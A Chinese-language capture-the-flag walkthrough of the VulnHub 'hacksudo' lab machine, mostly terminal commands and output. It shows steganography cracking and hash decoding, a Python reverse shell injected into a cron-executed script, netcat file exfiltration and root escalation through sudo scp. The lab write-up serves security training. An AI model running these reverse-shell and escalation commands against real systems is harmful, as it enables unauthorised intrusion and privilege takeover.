tomcat@hacksudo:/var/www$ ls
ls
backup  html
tomcat@hacksudo:/var/www$ cd backup
cd backup
bash: cd: backup: Not a directory
tomcat@hacksudo:/var/www$ cat backup
cat backup
recover your access,from ***
tomcat@hacksudo:/var/www$ cd html
cd html
tomcat@hacksudo:/var/www/html$ ls -al
ls -al
total 172
drwxr-xr-x 6 www-data www-data 4096 Jan 29  2021 .
drwxr-xr-x 3 root     root     4096 Mar 30  2021 ..
-rw-r--r-- 1 www-data www-data  940 Jan 25  2021 add.php
-rw-r--r-- 1 www-data www-data 3243 Jan 25  2021 add_product.php
-rw-r--r-- 1 www-data www-data 1925 Jan 25  2021 admin.php
-rw-r--r-- 1 www-data www-data 2344 Jan 25  2021 cart.html
-rw-r--r-- 1 www-data www-data 2234 Jan 25  2021 cart_update.php
-rw-r--r-- 1 www-data www-data  592 Jan 26  2021 config.php
drwxr-xr-x 2 www-data www-data 4096 Jan 25  2021 css
-rw-r--r-- 1 www-data www-data  519 Jan 25  2021 delete.php
-rw-r--r-- 1 www-data www-data   77 Jan 25  2021 destroy.php
-rw-r--r-- 1 www-data www-data 1464 Jan 25  2021 fandom.php
-rw-r--r-- 1 www-data www-data   12 Jan 28  2021 flag1.txt
-rw-r--r-- 1 www-data www-data 9696 Jan 25  2021 got.php
-rw-r--r-- 1 www-data www-data 9672 Jan 25  2021 hg.php
-rw-r--r-- 1 www-data www-data 9676 Jan 25  2021 hp.php
drwxr-xr-x 2 www-data www-data 4096 Jan 25  2021 html
-rw-r--r-- 1 www-data www-data 2550 Jan 25  2021 index.php
-rw-r--r-- 1 www-data www-data  162 Jan 25  2021 info.txt
-rw-r--r-- 1 www-data www-data 2808 Jan 25  2021 inventory.php
-rwx---r-x 1 www-data www-data  185 Jan 29  2021 level1.sh
-rw-r--r-- 1 www-data www-data 1071 Jan 25  2021 LICENSE
-rw-r--r-- 1 www-data www-data  922 Jan 25  2021 log.php
-rw-r--r-- 1 www-data www-data 6681 Jan 25  2021 products.sql
-rw-r--r-- 1 www-data www-data  914 Jan 25  2021 pro.php
-rw-r--r-- 1 www-data www-data  911 Jan 25  2021 pro.php.save
-rw-r--r-- 1 www-data www-data  185 Jan 25  2021 query.txt
-rw-r--r-- 1 www-data www-data  469 Jan 25  2021 README.md
-rw-r--r-- 1 www-data www-data 2526 Jan 25  2021 remove_product.php
drwxr-xr-x 9 www-data www-data 4096 Jan 25  2021 res
drwxr-xr-x 2 www-data www-data 4096 Jan 25  2021 scripts
-rw-r--r-- 1 www-data www-data 5296 Jan 25  2021 search.php
-rw-r--r-- 1 www-data www-data  696 Jan 25  2021 signup.php
-rw-r--r-- 1 www-data www-data 1671 Jan 25  2021 users.sql
-rw-r--r-- 1 www-data www-data 3039 Jan 25  2021 view_cart.php
tomcat@hacksudo:/var/www/html$ cat flag1.txt
cat flag1.txt
level up 1!
tomcat@hacksudo:/var/www/html$ 

额,没想到这个flag1真就是了,回头再看看var目录下还有啥

tomcat@hacksudo:/var/www/html$ cd /var
cd /var
tomcat@hacksudo:/var$ ls
ls
backups  crash  local  log   opt  snap   tmp
cache    lib    lock   mail  run  spool  www
tomcat@hacksudo:/var$ ls -al
ls -al
total 56
drwxr-xr-x 14 root root   4096 Jan 22  2021 .
drwxr-xr-x 20 root root   4096 Jan 22  2021 ..
drwxr-xr-x  3 root root   4096 May  5 02:13 backups
drwxr-xr-x 15 root root   4096 Jan 29  2021 cache
drwxrwxrwt  2 root root   4096 Mar 30  2021 crash
drwxr-xr-x 44 root root   4096 Jan 23  2021 lib
drwxrwsr-x  2 root staff  4096 Oct 16  2020 local
lrwxrwxrwx  1 root root      9 Oct 22  2020 lock -> /run/lock
drwxrwxr-x 11 root syslog 4096 May  5 01:27 log
drwxrwsr-x  2 root mail   4096 Oct 22  2020 mail
drwxr-xr-x  2 root root   4096 Oct 22  2020 opt
lrwxrwxrwx  1 root root      4 Oct 22  2020 run -> /run
drwxr-xr-x  5 root root   4096 Oct 22  2020 snap
drwxr-xr-x  4 root root   4096 Oct 22  2020 spool
drwxrwxrwt  6 root root   4096 May  5 01:27 tmp
drwxr-xr-x  3 root root   4096 Mar 30  2021 www
tomcat@hacksudo:/var$ cd backups
cd backups
tomcat@hacksudo:/var/backups$ ls -al
ls -al
total 860
drwxr-xr-x  3 root     root       4096 May  5 02:13 .
drwxr-xr-x 14 root     root       4096 Jan 22  2021 ..
-rw-r--r--  1 root     root      81920 Jan 29  2021 alternatives.tar.0
-rw-r--r--  1 root     root      42640 Mar 30  2021 apt.extended_states.0
-rw-r--r--  1 root     root       4602 Jan 29  2021 apt.extended_states.1.gz
-rw-r--r--  1 root     root       4594 Jan 23  2021 apt.extended_states.2.gz
-rw-r--r--  1 root     root        268 Jan 22  2021 dpkg.diversions.0
-rw-r--r--  1 root     root        135 Jan 22  2021 dpkg.statoverride.0
-rw-r--r--  1 root     root     714690 Jan 26  2021 dpkg.status.0
drwxr-xr-x  2 www-data www-data   4096 Mar 30  2021 hacksudo
tomcat@hacksudo:/var/backups$ cd hacksudo
cd hacksudo
tomcat@hacksudo:/var/backups/hacksudo$ ls -al
ls -al
total 112
drwxr-xr-x 2 www-data www-data  4096 Mar 30  2021 .
drwxr-xr-x 3 root     root      4096 May  5 02:13 ..
-rw-r--r-- 1 www-data www-data   176 Jan 29  2021 hacksudo.zip
-rw-r--r-- 1 www-data www-data    12 Mar 30  2021 log.txt
-rw-r--r-- 1 www-data www-data 96006 Mar 30  2021 vishal.jpg
tomcat@hacksudo:/var/backups/hacksudo$ cat log.txt
cat log.txt
ilovestegno
tomcat@hacksudo:/var/backups/hacksudo$ 

log.txt文件显示 ilovestgno,不知道这个是不是hacksduo 用户的密码

此外,还有用户vishal的图像

因此,这可能表明咱们必须使用隐写术的概念从图像中提取信息。

这里咱们只需关闭 shell 并使用meterpreter shell 下载到本地kali中

meterpreter > download vishal.jpg
[*] Downloading: vishal.jpg -> /home/kali/vulnhub/hacksudo: 1.0.1/vishal.jpg
[*] Downloaded 93.76 KiB of 93.76 KiB (100.0%): vishal.jpg -> /home/kali/vulnhub/hacksudo: 1.0.1/vishal.jpg
[*] download   : vishal.jpg -> /home/kali/vulnhub/hacksudo: 1.0.1/vishal.jpg
meterpreter > download hacksudo.zip
[*] Downloading: hacksudo.zip -> /home/kali/vulnhub/hacksudo: 1.0.1/hacksudo.zip
[*] Downloaded 176.00 B of 176.00 B (100.0%): hacksudo.zip -> /home/kali/vulnhub/hacksudo: 1.0.1/hacksudo.zip
[*] download   : hacksudo.zip -> /home/kali/vulnhub/hacksudo: 1.0.1/hacksudo.zip
meterpreter > 

先分析一下图片

⬢  hacksudo: 1.0.1  binwalk vishal.jpg                        

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

⬢  hacksudo: 1.0.1  steghide extract -sf vishal.jpg                        
Enter passphrase: 
steghide: could not extract any data with that passphrase!
⬢  hacksudo: 1.0.1  stegcracker vishal.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2022 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'vishal.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyou
Tried 5 passwords
Your file has been written to: vishal.jpg.out
iloveyou
⬢  hacksudo: 1.0.1  cat vishal.jpg.out 
onpxhc bs unpxfhqb znpuvar hfre
hfre ivfuny
cnffjbeq 985nn195p09so7q64n4oo24psr51so1s13rop444p494r765rr99q6p3rs46557p757787s8s5n6r0260q2r0r846q263sosor1311p884oo0os9792s8778n4434327
⬢  hacksudo: 1.0.1  

图片中写入的字符串像是偏移类编码

拿去分析一下:https://www.dcode.fr/cipher-identifier

image-20220505152400600

发现是第一行的是rot13编码

拿去https://gchq.github.io/CyberChef解码一下

image-20220505152840587

backup of hacksudo machine user
user vishal
password 985aa195c09fb7d64a4bb24cfe51fb1f13ebc444c494e765ee99d6c3ef46557c757787f8f5a6e0260d2e0e846d263fbfbe1311c884bb0bf9792f8778a4434327

正如我们在上面看到的,我们有一个用户 vishal 的哈希密码。

尝试在破解网站上破解它

image-20220505153033625

成功解出密码为hacker

咱们可以使用 SSH 登录用户 vishal

⬢  hacksudo: 1.0.1  ssh vishal@192.168.9.12 -p 2222
The authenticity of host '[192.168.9.12]:2222 ([192.168.9.12]:2222)' can't be established.
ED25519 key fingerprint is SHA256:qONQFtM7gA1MwuALlXQQ1cK8nu0nhYmmhbk2DAAMfnQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.9.12]:2222' (ED25519) to the list of known hosts.
vishal@192.168.9.12's password: 
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-41-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May  5 04:19:49 AM UTC 2022

  System load:  0.28               Processes:               132
  Usage of /:   33.6% of 19.56GB   Users logged in:         0
  Memory usage: 27%                IPv4 address for enp0s3: 192.168.9.12
  Swap usage:   0%

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

5 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Mar 30 17:03:31 2021 from 192.168.43.216
vishal@hacksudo:~$ 

查看用户目录下都有啥

vishal@hacksudo:~$ cat flag2.txt
level up 2!!
vishal@hacksudo:~$ cat .bash_history 
vishal@hacksudo:~$ cat level2.sh 
#!/bin/bash
echo  -e "\033[33;5;7mhey hacker great job!\033[0m"
echo  -e "\033[33;5mLEVEL UP 2 \033[0m"
echo  -e "\033[33;5;7m your really great hacker !\033[0m"

vishal@hacksudo:~$ cat .sudo_as_admin_successful
vishal@hacksudo:~$ cat .selected_editor
# Generated by /usr/bin/select-editor
SELECTED_EDITOR="/bin/nano"
vishal@hacksudo:~$ cd employee/
vishal@hacksudo:~/employee$ ls
vishal@hacksudo:~/employee$ ls -al
total 8
drwxr-xr-x 2 root   root   4096 Jan 26  2021 .
drwxr-xr-x 8 vishal vishal 4096 Jan 29  2021 ..
vishal@hacksudo:~/employee$ cd ..
vishal@hacksudo:~$ cd manager/
-bash: cd: manager/: Permission denied
vishal@hacksudo:~$ cd office/
vishal@hacksudo:~/office$ ls -al
total 40
drwxrwxr-x 2 vishal   vishal    4096 Mar 30  2021 .
drwxr-xr-x 8 vishal   vishal    4096 Jan 29  2021 ..
-rw-rw-r-- 1 vishal   vishal    1024 Jan 28  2021 .get,c.swp
---xr--r-- 1 hacksudo hacksudo 16704 Jan 28  2021 hacksudo
-rw-rw-r-- 1 vishal   vishal     110 Jan 28  2021 hacksudo.c
-rwxrwxr-x 1 vishal   vishal     313 Mar 30  2021 manage.sh
vishal@hacksudo:~/office$ cat hacksudo.c 
include<unistd.h>
void main()
{       setuid(1000);
        setgid(1000);
        system("bash /home/vishal/office/manage.sh");
}
vishal@hacksudo:~/office$ cat manage.sh
#!/bin/bash
echo  -e "\033[33;5;7mhey hacker great job!\033[0m"
echo "hey  vishal are you ready to get manager access ?(Y/N)"
read  input
echo "did you  recon your tasked access ? (Y/N)"
read input
echo  -e "\033[33;5;7myou have  1 minute to figure out!\033[0m"

echo  -e "\033[33;5;7m try to boommmm!!!!\033[0m"

首先查看一下flag2
紧接着继续在当前目录下找相关有用的信息,期间找到level2.sh hacksudo.c manage.sh

查看其内容

hacksudo.c源代码告诉咱们它编译的二进制文件将首先设置执行它的用户的 setuid 权限,然后,它将运行 manage.sh 脚本

接下来,manage.sh 脚本包含一些命令,例如 echo

更重要的是,用户有权写入manage.sh文件

因此,他可以编写任何将由用户 hacksudo 执行的命令

但是,其他用户无法执行二进制 hacksudo,因为它只能由它的所有者执行,即用户 hacksudo

因此,我决定查看 crontab计划任务

vishal@hacksudo:~/office$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
*/1 *   * * *   hacksudo /home/hacksudo/./getmanager
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
vishal@hacksudo:~/office$ 

上述内容中,咱们可以看到用户 hacksudo 每分钟都在运行一个程序getmanager

所以,我决定查看二进制文件的内容

由于机器上没有安装二进制字符串,我决定将二进制文件下载到我的kali机器上

方法一:nc传输文件

# 本地kali机器上
nc -nlvp 5555 > getmanager
# 靶机上
nc 192.168.9.3 5555 < /home/hacksudo/getmanager
# 在本地靶机上Ctrl+C

方法二:FileZilla上传

image-20220505232904201

本地kali中查看其内容

⬢  hacksudo: 1.0.1  strings getmanager                                     
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
bash /home/vishal/office/manage.sh
;*3$"
GCC: (Debian 10.2.0-16) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
get.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
⬢  hacksudo: 1.0.1  

看起来,这与我们在vishaloffice 目录中看到的二进制文件相同,即 hacksudo

就像我之前说的,用户 vishal 可以编写任何他想以用户 hacksudo 执行的命令。

所以这里咱们可以添加以下内容提权至hacksudo用户

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.9.3",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

靶机上操作

vishal@hacksudo:~/office$ vim manage.sh 
vishal@hacksudo:~/office$ cat manage.sh 
#!/bin/bash
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.9.3",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
echo  -e "\033[33;5;7mhey hacker great job!\033[0m"
echo "hey  vishal are you ready to get manager access ?(Y/N)"
read  input
echo "did you  recon your tasked access ? (Y/N)"
read input
echo  -e "\033[33;5;7myou have  1 minute to figure out!\033[0m"

echo  -e "\033[33;5;7m try to boommmm!!!!\033[0m"
vishal@hacksudo:~/office$ 

添加的新行将在我正在侦听的端口上生成一个反向 shell

⬢  hacksudo: 1.0.1  nc -lvp 6666             
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.9.3] from bogon [192.168.9.12] 45548
hacksudo@hacksudo:~$ 

当前目录下找一下是否有可以利用的

hacksudo@hacksudo:~$ cat user.txt
cat user.txt
bb81133d9e5c204f15a466d357f3b519
hacksudo@hacksudo:~$ cat level3.sh
cat level3.sh
#!/bin/bash
echo  -e "\033[33;5;7mBOOOMMMM babeeeeeeeeeeeeeeee!!!!!\033[0m"
echo great job  dear
echo  -e "\033[33;5;7mhey pro hacker great job!\033[0m"
echo  -e "\033[33;5mLEVEL UP 3 \033[0m"
echo  -e "\033[33;5;7m user pwnd! \033[0m"

查看一下sudo -l

hacksudo@hacksudo:~$ sudo -l
sudo -l
Matching Defaults entries for hacksudo on hacksudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hacksudo may run the following commands on hacksudo:
    (root) NOPASSWD: /usr/bin/scp
hacksudo@hacksudo:~$ 

用户可以在不需要密码的情况下以 root 身份运行 scp

此外,该二进制文件允许执行 shell 命令。

https://gtfobins.github.io找一下该程序的利用方法

image-20220505233901497

TF=$(mktemp)
echo 'bash 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

按步骤运行一下

hacksudo@hacksudo:~$ TF=$(mktemp)
TF=$(mktemp)
hacksudo@hacksudo:~$ echo 'bash 0<&2 1>&2' > $TF
echo 'bash 0<&2 1>&2' > $TF
hacksudo@hacksudo:~$ chmod +x "$TF"
chmod +x "$TF"
hacksudo@hacksudo:~$ sudo scp -S $TF x y:
sudo scp -S $TF x y:
root@hacksudo:/home/hacksudo# cd /root 
cd /root
root@hacksudo:~# ls -al
ls -al
total 56
drwx------  6 root root 4096 Jan 29  2021 .
drwxr-xr-x 20 root root 4096 Jan 22  2021 ..
-rw-------  1 root root 8097 Mar 30  2021 .bash_history
-rw-r--r--  1 root root 3106 Aug 14  2019 .bashrc
drwx------  2 root root 4096 Jan 27  2021 .cache
-r-x------  1 root root  261 Jan 29  2021 level4.sh
drwxr-xr-x  3 root root 4096 Jan 22  2021 .local
-rw-------  1 root root  276 Jan 25  2021 .mysql_history
-rw-r--r--  1 root root  161 Sep 16  2020 .profile
-r--------  1 root root   33 Jan 27  2021 root.txt
-rw-r--r--  1 root root   66 Jan 26  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Jan 22  2021 snap
drwx------  2 root root 4096 Jan 25  2021 .ssh
root@hacksudo:~# cat root.txt
cat root.txt
53555e221628c30119f01dcaa3f711b9
root@hacksudo:~# 

成功拿到root权限,并在root目录下拿到最终flag

总结

本靶机挺有意思的,通过信息收集找到相关敏感文件,拿到用户密码(虽然没啥用),通过对tomcat的webapp的利用,成功拿到shell,然后通过计划任务提权至hacksudo用户,最后通过scp提权

  1. 信息收集
  2. dirsearch、gobuster目录扫描
  3. tomcat的webapp的利用
  4. meterpreter的使用---反弹shell、下载文件
  5. rot13解密、hash解密
  6. 计划任务提权
  7. sudo提权---scp提权
posted @ 2022-05-06 00:07  hirak0  阅读(765)  评论(0编辑  收藏  举报